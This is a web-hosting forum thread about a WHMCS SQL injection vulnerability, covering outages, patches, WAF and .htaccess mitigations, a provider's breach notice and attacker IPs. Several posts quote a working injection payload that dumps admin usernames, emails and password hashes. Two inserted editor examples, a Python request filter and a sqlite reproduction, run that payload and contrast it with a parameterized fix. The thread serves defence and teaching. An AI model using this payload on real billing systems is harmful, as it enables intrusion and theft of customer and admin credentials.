# New WHMCS Exploit



## Aldryic C'boas

http://localhost.re/p/whmcs-527-vulnerability

tl;dr - A rather gaping security hole in WHMCS.  I've taken ours offline - strongly suggest other providers do the same.


----------



## concerto49

Have you contacted WHMCS? Just did.


----------



## fapvps

Yeah this one is pretty bad. We took ours down also.


----------



## Jono20201

Damn. Disabled ours for now, has this been confirmed? Does just putting the system into Maintenance mode make it 'safe'?


----------



## Aldryic C'boas

Jono20201 said:


> Damn. Disabled ours for now, has this been confirmed? Does just putting the system into Maintenance mode make it 'safe'?


Yes, this is confirmed.  After seeing the... utterly incompetent coding practices, I wouldn't trust just using Maintenance mode.  I ripped down our entire install and just put up a placeholder for now.


----------



## DamienSB

Aldryic C said:


> Yes, this is confirmed.  After seeing the... utterly incompetent coding practices, I wouldn't trust just using Maintenance mode.  I ripped down our entire install and just put up a placeholder for now.





Code:


[[email protected] ~]# service httpd stop
Stopping httpd:                                            [  OK  ]
[[email protected] ~]#


----------



## Jono20201

Aldryic C said:


> Yes, this is confirmed.  After seeing the... utterly incompetent coding practices, I wouldn't trust just using Maintenance mode.  I ripped down our entire install and just put up a placeholder for now.


Mind if I nick your parts of your maintenance message? Too tired to think of something decent.




DamienSB said:


> [[email protected] ~]# service httpd stop
> Stopping httpd:                                            [  OK  ]
> 
> 
> [[email protected] ~]#


Surely best to put a html message up?


----------



## Aldryic C'boas

Jono20201 said:


> Mind if I nick your parts of your maintenance message? Too tired to think of something decent.


Nah, go for it, I don't mind.


----------



## rds100

Code:


RewriteCond %{QUERY_STRING} AES_ENCRYPT
RewriteRule ^(.+) /sorry.html [L]


This helps? Not sure if %{QUERY_STRING} would catch POST data or what would be the correct variable for that.


----------
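rds100's question above (whether `%{QUERY_STRING}` sees POST data) answered in code, as an added example that is not from the thread or from WHMCS. Apache's `RewriteCond %{QUERY_STRING} AES_ENCRYPT` runs a case-sensitive regex over the raw, still percent-encoded query string and never looks at the request body, so the same payload in a form POST walks straight past it, as does `%41ES_ENCRYPT` in a GET. The check below inspects both surfaces after decoding. The request lines are constructed for the demo, not captured traffic, and the body decoding assumes `application/x-www-form-urlencoded`; both are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Added example (editor's, not WHMCS code): a request check that covers the query
# string AND a form body, beside what a RewriteCond on %{QUERY_STRING} actually sees.

TOKEN = re.compile(r"AES_ENCRYPT\s*\(", re.IGNORECASE)


def rewritecond_matches(query_string):
    """What 'RewriteCond %{QUERY_STRING} AES_ENCRYPT' evaluates: a case-sensitive regex over
    the raw, percent-encoded query string. The request body is never consulted."""
    return re.search(r"AES_ENCRYPT", query_string) is not None


def normalize(raw):
    """Percent-decode repeatedly (bounded) so that %41ES_ENCRYPT, double-encoded forms and
    '+' for space collapse to the literal token before matching."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def request_blocked(method, query_string, body=""):
    """Inspect every place form data can arrive: the query string for any method and the
    urlencoded body for POST. Assumption: application/x-www-form-urlencoded bodies only;
    multipart or JSON bodies would need their own decoder before this check."""
    surfaces = [query_string]
    if method.upper() == "POST":
        surfaces.append(body)
    return any(TOKEN.search(normalize(s)) for s in surfaces)


# Constructed requests (not captured traffic). The second is the kind of profile update
# the thread quotes, sent as a normal form POST.
REQUESTS = [
    ("GET", "firstname=AES_ENCRYPT(1,1)", ""),
    ("POST", "", "firstname=AES_ENCRYPT%281%2C1%29%2C+firstname%3D%28SELECT+1%29&lastname=x"),
    ("POST", "", "firstname=aes_encrypt%20(1,1)"),
    ("GET", "firstname=%41ES_ENCRYPT(1,1)", ""),
    ("POST", "", "firstname=Alice&lastname=Example"),
]


def evaluate(requests=REQUESTS):
    """Return (RewriteCond result, body-aware result) for each request."""
    return [(rewritecond_matches(q), request_blocked(m, q, b)) for m, q, b in requests]


if __name__ == "__main__":
    for (m, q, b), (rc, blocked) in zip(REQUESTS, evaluate()):
        print(f"{m:4} query={q!r:32} body={b[:44]!r:48} RewriteCond={rc} body-aware={blocked}")
```

Only the first request trips the RewriteCond; the other three malicious ones reach the application untouched. That is the gap a mod_security or NAXSI rule set closes, since those inspect decoded request bodies, which is why the later posts in this thread recommend a WAF over a rewrite rule.


----------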



## DamienSB

Jono20201 said:


> Mind if I nick your parts of your maintenance message? Too tired to think of something decent.
> 
> 
> Surely best to put a html message up?


Didn't know if the exploit was real or not - why spend 5 minutes on an error page when you might remove it in an hour. But it looks like this is real, so I’m going to make a page. But either way, people aren't going to care why it is down.


----------



## Erawan

So this is why RamNode went down for the client area?


----------



## George_Fusioned

I added the following on top of my .htaccess



Code:


Order allow,deny
# for email piping to work (Apache does not accept comments after a directive on the same line)
Allow from 127.0.0.1
# my VPN IP
Allow from x.x.x.x
Deny from all


----------



## rds100

@George_Fusioned you might want to also add these:

allow from 173.0.81.1

allow from 173.0.81.33

allow from 66.211.170.66

 

This is to allow PayPal's IPN to still work (for subscription payments that you might receive).


----------



## AnthonySmith

I assume it affects pre 5.2.7 as well?


----------



## Aldryic C'boas

AnthonySmith said:


> I assume it affects pre 5.2.7 as well?


The file in question is an old one, pre 4.* days.  I can't imagine they would replace a secure, working file with the atrocity there now, so safest just to assume all versions are affected.


----------



## Nick_A

Erawan said:


> So this is why RamNode went down for the client area?


Yes.


----------



## Jono20201

Wonder how long it'll take WHMCS. Hope they aren't thinking "we'll fix it monday". Lot of lost business.


----------



## MCH-Phil

Our billing system is now offline as well.  Oh well another fun day


----------



## Jono20201

http://blog.whmcs.com/?t=79274

Let's hope they're not all on a plane back home.


----------



## Aldryic C'boas

Jono20201 said:


> Wonder how long it'll take WHMCS. Hope they aren't thinking "we'll fix it monday". Lot of lost business.





Jono20201 said:


> http://blog.whmcs.com/?t=79274
> 
> Let's hope they're not all on a plane back home.


David's working on a fix now, from the hotel lobby.


----------



## Jon.Fatino

That's a pretty bad one right there... Hope it gets fixed asap.


----------



## fapvps

At least they are working on it.


----------



## George_Fusioned

Aldryic C said:


> Nah, go for it, I don't mind.


Shamelessly copied it as well :wub:


----------



## ryanarp

George_Fusioned said:


> Shamelessly copied it as well :wub:


Let's all include Buyvm support e-mail as well, then we can take the day off. Hopefully everyone changed those minor details.


----------



## Jade

Ahh, hope it gets fixed soon! We removed our billing system as well until this is fixed.


----------



## Jono20201

https://twitter.com/whmcs/status/385811317179052032


----------



## vld

Incremental patch: http://www.whmcs.com/members/downloads.php?action=displaycat&catid=1


----------



## AnthonySmith

People now seem to be suggesting this only affected 5.2.7 ...I find that hard to believe.


----------



## serverian

AnthonySmith said:


> People now seem to be suggesting this only affected 5.2.7 ...I find that hard to believe.


It affected all 5.x, didn't check it on 4


----------



## CodyRo

serverian said:


> It affected all 5.x, didn't check it on 4


You have bigger issues if you're still running 4.x


----------



## Aldryic C'boas

serverian said:


> It affected all 5.x, didn't check it on 4


It's an old file, from back in the <4.* days.  I find it very hard to believe that they would take a secure, working file and replace it with such a massive security hole - so there's every reason to assume that all WHMCS versions are affected.


----------



## Cloudrck

I take it WHMCS doesn't do security audits?


----------



## JackDoan

Aldryic C said:


> http://localhost.re/p/whmcs-527-vulnerability
> 
> tl;dr - A rather gaping security hole in WHMCS.  I've taken ours offline - strongly suggest other providers do the same.


Including a python script to take advantage of it? Talk about responsible disclosure. -_-

*Edit:* localhost.re includes the script, not Aldryic. Important detail for those who don't actually click the link.


----------



## RiotSecurity

That's fine by me. I'd hate to see good old Robert Clarke hit...

oh wait.


----------



## lbft

The first provider emailing with bad news, ShardHost:

URGENT - Recent WHMCS Exploit

Upon investigation in light of the recent WHMCS exploit (http://blog.whmcs.com/?t=79427) it has been discovered that our client database was accessed as a result of using this exploit. Although client area passwords are not stored in plain text it is advisable that you change passwords as a matter of precaution. KVM root server passwords are not affected as these are not stored at all.

Although we patched our systems as soon as we were able to it seems we were one of the first targets. We have since restored a clean restoration of our billing system prior to the attack and have confirmed this is no longer vulnerable to the particular attack vector used.

We apologise sincerely for this breach of your trust and are deeply disappointed ourselves in the trust we place in WHMCS as a third party billing software provider.

If you have any questions on this matter, please contact us via support ticket; where we will be happy to discuss this matter in detail.

Again please accept our apologies on this matter.

I doubt this will be the last, unfortunately, although I'm more worried about the customers of the providers that either don't notify them or don't even know they were exploited.


----------



## rds100

Everyone go and install mod_dumpio. Who knows when you would need to analyze the logs?


----------



## Aldryic C'boas

lbft said:


> The first provider emailing with bad news, ShardHost:
> 
> URGENT - Recent WHMCS Exploit
> 
> Upon investigation in light of the recent WHMCS exploit (http://blog.whmcs.com/?t=79427) it has been discovered that our client database was accessed as a result of using this exploit. Although client area passwords are not stored in plain text it is advisable that you change passwords as a matter of precaution. KVM root server passwords are not affected as these are not stored at all.
> 
> 
> Although we patched our systems as soon as we were able to it seems we were one of the first targets. We have since restored a clean restoration of our billing system prior to the attack and have confirmed this is no longer vulnerable to the particular attack vector used.
> 
> 
> We apologise sincerely for this breach of your trust and are deeply disappointed ourselves in the trust we place in WHMCS as a third party billing software provider.
> 
> 
> If you have any questions on this matter, please contact us via support ticket; where we will be happy to discuss this matter in detail.
> 
> 
> Again please accept our apologies on this matter.
> 
> I doubt this will be the last, unfortunately, although I'm more worried about the customers of the providers that either don't notify them or don't even know they were exploited.


Passwords aside - that's a lot of names/emails/physical addresses that just got leaked.  Those folks won't be happy.


----------



## CodyRo

rds100 said:


> Everyone go and install mod_dumpio. Who knows when you would need to analyze the logs?


That is definitely useful but things such as WHMCS (or really any web application) should be behind a WAF. Most generic SQL injection rules would have prevented this - I know ours prevented the exploit from even getting to WHMCS.

I'd recommend taking a peek at ASL's modsec rules - they're robust and very well done (modular to boot as well)!


----------



## George_Fusioned

CodyRo said:


> I'd recommend taking a peek at ASL's modsec rules - they're robust and very well done (modular to boot as well)!


Did you get them to work with LiteSpeed?


----------



## MannDude

Who's been hit? Looks pretty nasty.

Waking up to some drama.


----------



## CodyRo

George_Fusioned said:


> Did you get them to work with LiteSpeed?


LiteSpeed's mod_security implementation is iffy at best (in my opinion - although they've done a better job at improving it). We personally put web applications that we don't trust / that are important behind Apache / mod_security to get the fullest effect. Far too many times we have seen wrong behaviour with mod_security rules under LiteSpeed.

I know some of the older ASL rules worked fine with LiteSpeed however the latest do not I believe.


----------



## George_Fusioned

Yeah, that's my experience too. Only had luck with older ASL rules until now, but to be fair they're improving mod_security support in each version.


----------



## KuJoe

Any experience with NAXSI?


----------



## terafire

We took ours down this morning, and as soon as we were back up we had some odd non-completed order sign-ups.


----------



## rsk

I just deleted the file when I heard about the exploit, waited for a bit, got the new "patched" update, uploaded the update, some idiot decided to try to exploit - he failed.

Hell, we don't really need a "panic" button hahaha, we just need software developers to use common sense when coding  :lol:


----------



## TJR

why not put your WHMCS behind an application firewall?  we did.  SQL injections are not happening here.  lots of free ones available online too.  A great way of protecting against future attacks


----------



## GIANT_CRAB

TJR said:


> why not put your WHMCS behind an application firewall?  we did.  SQL injections are not happening here.  lots of free ones available online too.  A great way of protecting against future attacks


Nice Cloudflare shilling :^)


----------



## tchen

Or... Naxsi (which I'll give TJR the benefit of doubt on)


Edit: Nvm, I see KuJoe already mentioned it.


----------



## TJR

huh?


----------



## RiotSecurity

TJR said:


> why not put your WHMCS behind an application firewall?  we did.  SQL injections are not happening here.  lots of free ones available online too.  A great way of protecting against future attacks


I rofl'd so hard.


----------



## TJR

am I missing something here or are you guys just jerks?


----------



## CodyRo

TJR said:


> am I missing something here or are you guys just jerks?


I think the latter.



GIANT_CRAB said:


> Nice Cloudflare shilling :^)


And I'm shilling for mod_security while others are shilling for Naxsi. *takes off the tin foil hat*


----------



## MannDude

TJR said:


> am I missing something here or are you guys just jerks?


The latter part. I think that they're under the impression you work for Cloudflare or something. I don't know. Ignore them.


----------



## KuJoe

So does anybody here have any experience with NAXSI? I was looking into it but I won't have time to setup a test environment for it until next week and I wouldn't put anything into production without testing it so I'm looking for some feedback before I proceed.


----------



## VPSCorey

We installed ASL onto my VMs running WHMCS / Hostbill to give it some exposure. No immediate issues other than Hostbill apparently requiring curl_exec and curl_multi_exec for some functions.


----------



## KuJoe

NAXSI was a simple install and looking pretty nice so far. I've got it in learning mode for now but it looks like I could put it live without any issues. My only fear is that I'm developing our new control panel on WHMCS 5.2.x with Apache so I'll need to move that over at some point.


----------



## ServerBros

We've had various users sign up and try this; my guess is they are simply using inurl: "powered by whmcs" on Google. Thankfully they were quick in patching it, however a company the size of WHMCS should really have their code audited before release so that things like this get picked up.


----------



## Riccardo_G

I have installed version 5.2.8.


----------



## XFS_Duke

People on one of our WHMCS installs keep changing their first name to:

'AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)

It isn't doing anything, but it's funny to see them register and try and try and try... lol


----------
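The payload XFS_Duke quotes above, worked through as an added example from the editor (not WHMCS's code and not anything posted in the thread): a small sqlite model of how a field value that begins with `AES_ENCRYPT(` can rewrite the whole `UPDATE`, beside the parameterized version that stores the identical string as harmless data. The schema, the rows, the `AES_ENCRYPT` stand-in and the builder's special-casing of that prefix are assumptions chosen to match the shape of the payload, not a reproduction of WHMCS source; the payload itself is the thread's, translated from MySQL syntax (`0x3a`, `SEPARATOR 0x2c20`) into sqlite's `||` and `group_concat(x, sep)`.

```python
import sqlite3

# Added example (editor's, not WHMCS code). Schema, rows and the AES_ENCRYPT stand-in are
# constructed; the builder's "pass AES_ENCRYPT(...) through unquoted" rule is an assumption.


def make_db():
    conn = sqlite3.connect(":memory:")
    # sqlite has no AES_ENCRYPT; register a stand-in so the payload's leading call parses.
    # Its result never matters: the payload's second assignment to firstname is the one kept.
    conn.create_function("AES_ENCRYPT", 2, lambda value, key: value)
    conn.executescript("""
        CREATE TABLE tblclients(id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT);
        CREATE TABLE tbladmins(id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT);
        INSERT INTO tblclients VALUES (7, 'Mallory', 'Example');
        INSERT INTO tbladmins VALUES (1, 'admin', 'admin@example.test', '$2y$hash-one');
        INSERT INTO tbladmins VALUES (2, 'billing', 'billing@example.test', '$2y$hash-two');
    """)
    return conn


def vulnerable_update(conn, client_id, fields):
    """Builds the UPDATE by concatenation. Values starting with 'AES_ENCRYPT(' are emitted
    raw so callers can use the MySQL function for encrypted columns (assumed convenience).
    Everything else is quoted and escaped, which is why escaping alone does not save this."""
    parts = []
    for col, val in fields.items():
        if val.startswith("AES_ENCRYPT("):
            parts.append(f"{col}={val}")            # raw: the user now writes SQL
        else:
            escaped = val.replace("'", "''")
            parts.append(f"{col}='{escaped}'")
    sql = f"UPDATE tblclients SET {', '.join(parts)} WHERE id={int(client_id)}"
    conn.execute(sql)
    conn.commit()
    return sql


def safe_update(conn, client_id, fields):
    """Same operation with bound parameters. Column names come from an allow-list, values
    are bound, so a value is stored verbatim no matter what it starts with."""
    allowed = ("firstname", "lastname")
    cols = [c for c in allowed if c in fields]
    sql = "UPDATE tblclients SET " + ", ".join(f"{c}=?" for c in cols) + " WHERE id=?"
    conn.execute(sql, [fields[c] for c in cols] + [client_id])
    conn.commit()
    return sql


# The thread's payload in sqlite dialect. Structure unchanged: a throwaway AES_ENCRYPT call,
# then a second assignment to firstname that copies the admin table into the attacker's
# own profile. Both MySQL and sqlite keep the last assignment to a repeated column.
PAYLOAD = ("AES_ENCRYPT(1,1), firstname=(SELECT group_concat("
           "id||':'||username||':'||email||':'||password, ', ') FROM tbladmins)")


def read_firstname(conn, client_id):
    """What the attacker sees on their profile page after the update."""
    return conn.execute("SELECT firstname FROM tblclients WHERE id=?", (client_id,)).fetchone()[0]


def demo_vulnerable():
    conn = make_db()
    vulnerable_update(conn, 7, {"firstname": PAYLOAD, "lastname": "Example"})
    return read_firstname(conn, 7)


def demo_safe():
    conn = make_db()
    safe_update(conn, 7, {"firstname": PAYLOAD, "lastname": "Example"})
    return read_firstname(conn, 7)


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())   # admin id:username:email:hash rows
    print("safe      :", demo_safe())         # the payload text itself, stored as data
```

This is also why the "lock client profile fields" advice in the following posts only narrows the attack surface rather than closing it: it removes one path by which attacker-controlled text reaches the builder, but any other field the same helper writes is still in play until the query is parameterized.


----------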



## TJR

XFS_Duke said:


> People on one of our WHMCS installs keep changing their first name to:
> 
> 'AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)
> 
> It isn't doing anything, but it's funny to see them register and try and try and try... lol


we should be posting IP addresses, can black-list them.


----------



## XFS_Duke

I'll post...

122.3.33.7

86.143.76.124

Will post more as I see them. I did, as well as recommend that everyone using WHMCS lock the name fields on their installation. It's simple to do:

Setup > General Settings > Other then Locked Client Profile Fields

I locked First Name, Last Name and Company... You could lock them all and make the customer contact you to update, but eh...


----------



## concerto49

XFS_Duke said:


> People on one of our WHMCS installs keep changing their first name to:
> 
> 
> 'AES_ENCRYPT(1,1), firstname=(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)
> 
> 
> It isn't doing anything, but it's funny to see them register and try and try and try... lol


We get this all day long too.


----------



## shovenose

XFS_Duke said:


> I locked First Name, Last Name and Company... You could lock them all and make the customer contact you to update, but eh...


I lock them all


----------



## ryanarp

concerto49 said:


> We get this all day long too.


We have only had this happen once, that was fun to watch.


----------






## SkylarM

We've had a bunch of people sign up but not place orders, we have Client fields locked outside of email after initial registration so maybe that helped? Who knows.


----------



## Francisco

Aldryic locks everything.

It's a pain in the butt to the customer but honestly, the only time people want to change things is when accounts aren't in their own name.

Francisco


----------



## SkylarM

Francisco said:


> Aldryic locks everything.
> 
> 
> It's a pain in the butt to the customer but honestly, the only time people want to change things is when accounts aren't in their own name.
> 
> 
> Francisco


I had to lock it all down when a customer doing not so legal things was terminated he promptly went in and edited his account details out of the account. Wasn't having any of that


----------



## MartinD

Likewise. We do have first and last name locked though. Regardless, all changes are logged and archived too for the above reason mentioned by SkylarM.


----------



## TJR

another exploit

http://localhost.re/


----------



## TJR

and here is an IP to add to your block lists:  91.194.91.196


----------



## jarland

Yay!


----------



## ServerBros

Thankfully another prompt fix, although it seems to have broken the mass mailing function!


----------



## RiotSecurity

ServerBros said:


> Thankfully another prompt fix, although it seems to have broken the mass mailing function!


and tomorrow... "New WHMCS Exploit, AGAIN"


----------



## Reece-DM

ServerBros said:


> Thankfully another prompt fix, although it seems to have broken the mass mailing function!


Glad it's not just me who realised that!


----------



## tchen

That mass mailing function deserved to be broken


----------



## ShardHost

WHMCS really need to get their act together.  They seem to learn nothing from each exploit.


----------



## ServerBros

RiotSecurity said:


> and tomorrow... "New WHMCS Exploit, AGAIN"


Too true, it's going to take a complete re-write to fix all their sloppy coding, or at the very least an external audit. cPanel are not much better, right enough, however they don't seem to make such rookie mistakes as WHMCS.


----------



## TJR

another IP to add to your block lists:  46.137.244.223


----------



## Ree

ShardHost said:


> WHMCS really need to get their act together.  They seem to learn nothing from each exploit.


In their defense, if these exploits are all in old code then anything they learn now won't help fix code they wrote days/months/years ago.


----------



## wlanboy

TJR said:


> another IP to add to your block lists:  46.137.244.223


Time to write an abuse email to Amazon Data Services Ireland Ltd.


----------



## Damian

You guys don't already have Amazon EC2 IP ranges blocked?


----------



## NodeBytes

The problem is that Amazon EC2 has a lot of legitimate users and a whole lot of spammers.


----------



## concerto49

Ree said:


> In their defense, if these exploits are all in old code then anything they learn now won't help fix code they wrote days/months/years ago.


Most of these are poor coding practices. They are mistakes that are so obvious. I wouldn't say it's old code. I think it's just how those developers operate. They can continue to patch the problems as they come but doesn't look like the root cause is getting fixed.


----------



## TJR

another????  is this a joke?   http://localhost.re/

does anyone know if that invoice exploit is patched with the new 5.2.12 update?

thank you


----------



## Magiobiwan

The invoice one was supposedly patched in the latest update.


----------



## TJR

now our credit cards are not processing in the nightly batch with the new patch of the patch of the patch (i.e. v5.2.12)


----------



## Francisco

TJR said:


> now our credit cards are not processing in the nightly batch with the new patch of the patch of the patch (i.e. v5.2.12)


I was so confused reading this the first time 

Francisco


----------



## Damian

FWIW, our credit cards have been processing fine. What CC gateway are you using? We're using Stripe via ServerPing's module.



Francisco said:


> I was so confused reading this the first time
> 
> Francisco


It's getting to be a bit cat-in-the-hat isn't it? One vuln, two vuln, red vuln, blue vuln.


----------



## TJR

we're using payflow

batch says 0 Credit Card Payments Processed (0 Failed)

also if you click the button to process all overdue invoices, same thing.

you got to hit them one by one and 'attempt capture' errr


----------



## SkylarM

Stripe via ServerPing's module working fine here as well.


----------

